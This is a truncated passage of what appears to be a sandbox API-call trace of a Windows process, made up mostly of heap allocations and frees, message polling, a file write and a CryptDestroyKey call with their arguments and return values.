(HeapHandle=0x970000, Flags=0x0, Size=0x166f8) returned 0x2ec3830 [0223.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0223.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0223.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977998 | out: hHeap=0x970000) returned 1 [0223.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0223.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0223.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0223.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0223.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0223.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0223.231] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0223.231] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0223.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0223.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0223.231] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f828 [0223.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0223.231] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0223.231] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0223.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04460 [0223.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0223.231] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0223.231] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0223.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0223.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0223.232] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0223.232] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0223.232] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0223.232] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04348 [0223.232] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0223.232] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0223.232] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0223.232] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0223.232] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0223.232] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0223.232] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0223.232] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.232] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0223.232] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0223.232] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0223.232] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0223.289] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0223.289] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.289] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0223.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0223.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0223.289] WriteFile (in: hFile=0x2a0, lpBuffer=0x3be0e78*, nNumberOfBytesToWrite=0x166f8, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x3be0e78*, lpNumberOfBytesWritten=0x8cf5e4*=0x166f8, lpOverlapped=0x0) returned 1 [0223.293] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0223.293] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0223.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0223.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0223.294] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0223.294] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0223.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0223.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0223.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0223.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0223.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0223.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f378 [0223.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0223.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0223.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0223.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0223.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0223.294] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0223.294] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0223.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0223.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0223.295] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0223.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0223.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0223.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0223.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0223.295] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0223.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0223.295] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2e51010, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0223.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0223.295] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyKey") returned 0x756ffa60 [0223.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0223.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0223.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0223.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0223.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0223.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0223.296] CryptDestroyKey (hKey=0xa873d0) returned 1 [0223.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e564e0 [0223.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0223.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0223.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0223.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0223.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0223.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0223.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0223.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0223.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0223.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0223.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0223.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0223.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0223.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0223.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0223.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0223.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0223.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0223.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0223.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0223.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0223.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0223.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0223.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0223.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0223.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0223.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0223.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0223.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f710 | out: hHeap=0x970000) returned 1 [0223.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0223.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0223.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0223.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0223.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0223.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0223.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0223.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e564e0 | out: hHeap=0x970000) returned 1 [0223.298] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0223.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0223.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0223.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0223.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0223.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0223.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f710 [0223.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0223.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0223.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0223.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0223.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0223.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0223.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0223.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0223.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0223.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0223.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0223.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0223.299] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0223.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f440 [0223.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0223.299] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0223.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f440 | out: hHeap=0x970000) returned 1 [0223.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0223.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ef0 [0223.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0223.299] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0223.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04460 [0223.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0223.299] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0223.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04460 | out: hHeap=0x970000) returned 1 [0223.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0223.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e18 [0223.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0223.299] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0223.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0223.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0223.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0223.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0223.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c08 [0223.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0223.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0223.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0223.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0223.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51010 [0223.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0223.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51088 [0223.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51130 [0223.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e511d8 [0223.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f738 [0223.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0223.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e30 [0223.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51190 [0223.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e511c0 [0223.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0223.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0223.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0223.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0223.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0223.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0223.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0223.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0223.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0223.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0223.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0223.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0223.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f738 | out: hHeap=0x970000) returned 1 [0223.301] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0223.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0223.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0223.301] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0223.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0223.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04508 [0223.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0223.301] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0223.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04508 | out: hHeap=0x970000) returned 1 [0223.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0223.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e18 [0223.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0223.301] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0223.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0223.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0223.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0223.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0223.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0223.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0223.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0223.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ba8 [0223.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ba8 | out: hHeap=0x970000) returned 1 [0223.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0223.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0223.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0223.302] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0223.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0223.302] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0223.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0223.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0223.302] PeekMessageW (in: lpMsg=0x8cf3a0, 